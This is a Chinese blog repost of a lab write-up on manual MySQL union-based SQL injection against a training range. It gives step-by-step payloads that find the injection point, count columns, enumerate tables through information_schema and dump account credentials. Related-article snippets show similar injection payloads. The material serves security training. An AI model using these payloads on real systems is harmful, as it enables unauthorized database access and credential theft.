Mysql手工注入

最新推荐文章于 2024-07-19 00:12:38 发布
最新推荐文章于 2024-07-19 00:12:38 发布
阅读量104 收藏 1
点赞数
文章标签: 数据库 操作系统
原文链接:http://www.cnblogs.com/Timesi/p/11025803.html
版权

实验环境:墨者学院Mysql手工注入漏洞测试靶场
后台源码没有进行任何字符过滤。

首先进入靶场环境
15605103136843.jpg
先用admin登陆试试
15605162158713.jpg
果然不行,这时看到用户登录下方有一个停机维护通知,点进去瞅瞅
15605104475821.jpg
看到这里链接上有id = 1,怀疑这里会有注入点。

判断注入点

先简单判断是不是字符型注入点,使用单引号闭合语句,注释后面的语句

?id = 1'--+

15605106681494.jpg
发现页面有异常,可能不是字符型,再试试数字型注入

?id = 1 and 1 = 1

15605107834469.jpg
发现and 1 = 1没有返回异常,再进一步进行判断

?id = 1 and 1 = 2

15605108646837.jpg
页面出现异常,说明这里存在数字型注入点

猜解字段数

发现存在注入点之后使用order by语句判断字段的数目。

?id=1 order by 3

1560511160681.jpg
先试一下是不是3列,发现没有报错,说明至少存在3列,接着猜解。
1560511220341.jpg
尝试到5发现报错了,因为字段没有5列,使用order by时无法根据第5列排序,所以出错,由此判断字段数目是4.

联合查询

因为猜解出来的字段数是4,所以联合查询的语句应该这么写?id=1 union select 1,2,3,4,但因为这个语句是成立的,为了让页面爆出我们需要的字段,这里就需要构造一个错误的语句,让数据库报错时返回我们需要的信息。

?id=-1 union select 1,2,3,4

15605148841175.jpg
可以看到这里页面上爆出了2和3两个数字,说明2和3两个数字对应当前数据表的两个字段会回显到页面上的,这样就可以根据2,3两个回显位查询一些我们需要的信息。
常用的Mysql系统函数有:

version()            #MySQL版本
user()               #数据库用户名
database()           #数据库名
@@datadir            #数据库路径
@@version_compile_os #操作系统版本

比如查询当前的数据库名称和当前用户。

?id=-1 union select 1,database(),user(),4

1560515289332.jpg
这样我们就成功查询到当前数据库,接着找这个数据库里的数据表。

查询数据表

补充1:数据库关键库
这里需要使用到数据库中一个重要的库information_schema,这个库下面的schemadata表中存放着所有数据库的信息,其中schema_name列中保存着所有数据库名,tables表中存放着所有数据表的信息,其中table_schema列存放着数据库名,table_name列存放着数据表名,columns表中存放着所有数据表的所有列信息,其中column_name存放着所有列名,table_name存放着表名。
补充2:concat函数的用法

1.concat(str1,str2)
将多个结果一行返回。如有任何一个参数为NULL ,则返回值为 NULL。

mysql> select 1,2,3;
+---+---+---+
| 1 | 2 | 3 |
+---+---+---+
| 1 | 2 | 3 |
+---+---+---+
1 row in set (0.00 sec)

mysql> select concat(1,2,3);
+---------------+
| concat(1,2,3) |
+---------------+
| 123           |
+---------------+
1 row in set (0.00 sec)

2.concat_ws(separator,str1,str2)
concat_ws是concat()的特殊形式。第一个参数是其它参数的分隔符,分隔符可以是一个字符串,也可以是其它参数。

mysql> select concat_ws('~',1,2,3);
+----------------------+
| concat_ws('~',1,2,3) |
+----------------------+
| 1~2~3                |
+----------------------+
1 row in set (0.00 sec)

3.group_concat完整语法如下,默认使用逗号分隔多个结果:
group_concat( [distinct] 要连接的字段 [order by 排序字段 asc/desc ] [separator '分隔符'] )

?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_name = database()

15605155258786.jpg
这样就查询到当前数据库里面有两个数据表,分别为StormGroup_member,notice

查询列名
?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'

15605156481273.jpg
查询到有这个表有四个字段id,name,password,status

查询数据

根据上面查询到的四个字段查询数据

?id=-1 union select 1,concat_ws('~',id,name,password,status),3,4 from StormGroup_member

15605157848912.jpg
成功查到账号密码,不过这个密码好像是加密的,先进行解密
15605159017760.jpg
使用这个账号密码登陆试试
15605160192900.jpg
最后尴尬的一幕出现了(/哭)。

转载于:https://www.cnblogs.com/Timesi/p/11025803.html

weixin_30387799
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
墨者 - SQL手工注入漏洞测试(MySQL数据库-字符型)
吃肉唐僧的博客
07-06 616
字符型,其实与数字型得注入思路没什么区别,只不过需要注意构造单引号和后面加注释就行了 id=tingjigonggao' order by 1-- 测试 字段个数,发现有4个 试过盲猜,admin,manger,失败 老老实实暴库,先测回显位置 id=tingjigongga' union select '1','2','3','4' -- /new_l...
[MySQL] SQL注入——手工注入
ZXW_NUDT的博客
10-13 666
此次用到的是DVWA平台 DVWA Security设置安全模式为low 用SQL Injection模块,通过布尔逻辑注入查询当前的所有lastname和firstname 1、通过union关键字注入查询当前使用数据库 ' union select session_user(),' ' # 2、通过union关键字和concat()/concat_ws函数注入查询当前数据库当前用户名,MySQL版本,当前数据库路径 ' union select concat(database(),ver
sql注入(Access)
华丽的贵族
09-05 200
access网站注入 - 测试网站: http://www.xxxx.com/news_view.asp?ClassID=1&newsid=60 - 注入步骤: 1.判断网站是否为access数据库 常用方法: 1)and (select count() from sysobjects)>0* 不报错则为SQL and (select count() from msysobj...
access注入(新手菜鸟随笔)
weixin_30279751的博客
11-01 284
作为一名新手,今天在博客园发第一篇随笔,纯属自娱自乐。 (高手绕道。此题是西安华山杯的web题。题目内容如下。进入正题。。) 本来想用SQLMAP跑出来但发现想多了。题目也提示了工具不适用,所以只能用纯手工。 http://218.245.4.113:8888/web03/ca55022fa7ae5c29d179041883fe1556/index.asp?id=886 1. ...
新的注入方法
weixin_34372728的博客
03-01 264
上次说了 一个办法 HOOK ntdll.memmove h1d 0{ 4C*=8oe_ 今天再讲一个 我们先来科普下 !q1^X% a |xC TX Windows环境进程的创建包括以下几个步骤: 4B,A+{3yL AMiFsgBj 打开EXE文件,创建局部的段对象; L*Cf&c`8r 创建Windows执行体进程对象; =1?yS3 创建和初...
PHP+MySQL 手工注入语句大全 推荐
10-29
我PHP手工太菜了, 无奈只能补下PHP MYSQL手工注射,把收集总结的资料分享下。
MySql手工注入.doc#资源达人分享计划#
08-12
MySQL手工注入是网络安全领域的一个重要话题,特别是在Web应用程序的安全防护MySQL数据库由于其广泛使用,成为了黑客攻击的目标。在本教程,我们将探讨如何利用MySQL手工注入漏洞来获取敏感信息。 首先,...
sql server 2008 mysql 手工注入
03-25
总的来说,SQL Server 2008和MySQL手工注入问题可以通过编程最佳实践、使用预处理语句、限制用户权限以及保持系统更新来有效预防。了解这些概念并能实际应用,对于任何IT专业人士,尤其是负责数据库管理和安全的...
access手工注入
baynk的博客
06-07 5879
写下来,加深印象,方便后期整理。 判断注入点 可以使用如下方法来判断: 特殊符号,\、/、'、"等。 -0 减数字看是否变化。 逻辑关系,and比较常用,这里讲讲or和xor,or、xor和and都是相反的,如果错误的就会回显正常,如果是正确的就会回显不正常。xor肯定是不同为真,相同为假,这个好理解,但是数据库里面or的逻辑关系到是有点奇怪了,同时为真时回显会不正常。 判断数据库类型 a...
SQL手工注入漏洞测试(MySQL数据库-字符型) 墨者学院
zwish的信安之路
04-29 1772
1、打开网页,查看源码,发现停机公告那里有个url,尝试注入一下 2、?id=tingjigonggao' 发现有个函数不满足,会报错,不过既然告诉了是字符型注入,再试一下: ?id=tingjigonggao' and '1'='1 发现成功显示 ?id=tingjigonggao' and '1'='2 显示有误 3、判断列数: ?id=' order by 1# 发现不行 使用?id='...
渗透笔记第二节(hack tools)
05-10 480
通过几天的学习,基本掌握了几种常用的检测工具,例如:检测网站注入漏洞的啊D,hdsi,NBSI等工具,这类工具都有一个共同的特点,功能比较全面,除了注入以及数据库名和字段猜解等功能,还融合了注入后台地址扫描,旁注,几种上传漏洞以及db_owner列目录等功能。漏洞扫描类,我经常用到的例如xscan,流光等等,最近经常使用天镜脆弱性扫描工具。文界面,漏洞库比较全。其实漏洞扫描类的软件分很
mysql 手工注入 字符类型
Praifire的博客
07-16 1772
我的基本思路: 1、目标站点环境为:Windows+Apache+Mysql+PHP 2、存在SQL注入,能否直接写一句话木马 3、存在SQL注入,获取数据库用户口令,登录应用系统后上传webshell 4、获取数据库口令登录phpMyAdimin,用phpMyAdmin写入一句话木马 当拿到一个MySQL注入点的时候,我们需要判断MySQL的版本。因为当MySQL的版本小于4.0时
SQL手工注入漏洞测试(MySQL数据库-字符型)解题思路
Routine_limon的博客
07-06 1578
靶环境:Nginx+PHP+MySQL 解题目标:手工进行SQL注入测试,获取管理密码登录。 解题思路: 寻找注入点:靶环境页面和上一篇一致,不在重复。 判断sql注入为字符型或整数型方法:https://blog.csdn.net/qq_30464257/article/details/84495884 根据注入的sql可判断出该sql为字符型注入 仿照上篇步骤进行sql注入: 获取列的字...
asp网站(asp+access)怎么防注入
weixin_30323631的博客
09-21 120
2009-09-02 11:10:48 近日有部分黑客通过我们网站进行sql注入来实现他的黑客成功的喜悦,多次造成本公司门户网站(http://www.gogochina.cn/)显示不正常,甚至内容和后台管理都无法进行.因此本人也是多次进行文件的上传工作,使得网站也是多次受到客户的对我提出为什么网站又无法打开或是打开内容显示不全等.   今天本人在网上搜了一些...
MySQL(事务、索引)&&MyBatis
最新发布
hycccccch的博客
07-19 460
事务指的是一组操作的集合,是一个不可分割的工作单位。事务会将所有的操作作为一个整体一起向系统提交或撤销操作请求,即这些操作要么同时成功,要么同时失败默认MySQL的事务是自动提交,即当执行一条DML语句时,MySQL会立即隐式的提交事务开启事务后运行事务不会对数据改变,commit后才会改变数据如果有命令发生错误,需要进行rollback进行回滚、
【星海随笔】vCenter Server 和主机管理。
weixin_41997073的博客
07-16 202
1.方法:删除页面信息,然后断连这个受管主机,断开受管主机的连接不会将其从 vCenter Server 移除,而只是临时挂起 vCenter Server 执行的所有监控活动。2.方法:在分布式存储找到该虚拟设备的存储盘,文件里找到相关的vmdk磁盘文件,点击注册虚拟机。当资料不匹配时候,可以删除展示页面,孤立的设备的 匹配位置的信息。断开后,然后重新连接,既可以重新识别受监管的主机。数据库在Vserver展示的是一个数据库的资料,应该是client的资料。1.确定为资料不匹配导致的展示问题。
Spring框架之DI依赖注入
G81948577的博客
07-18 577
我们在下面构建spring的过程体会依赖注入;从上面的图我们知道,在ssm框架服务层(server)无法直接操作数据库,持久层(dao)是直接操作数据库进行数据处理的,但是我们如果在服务层有一个持久层的对象,然后我们在服务层通过对象去调用持久层的方法就可以操作数据库了。@OverrideSystem.out.println("持久层,你好");UserServiceImpl类的代码如下@Override。
PHP手工注入实战:揭示数据库秘密
"这篇文档详细介绍了如何进行PHP手工注入攻击,通过实例展示了SQL注入的过程,以及如何获取数据库的相关信息。" 在PHP编程,SQL注入是一种常见的安全漏洞,攻击者可以利用这种漏洞来操纵数据库查询,获取敏感信息...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值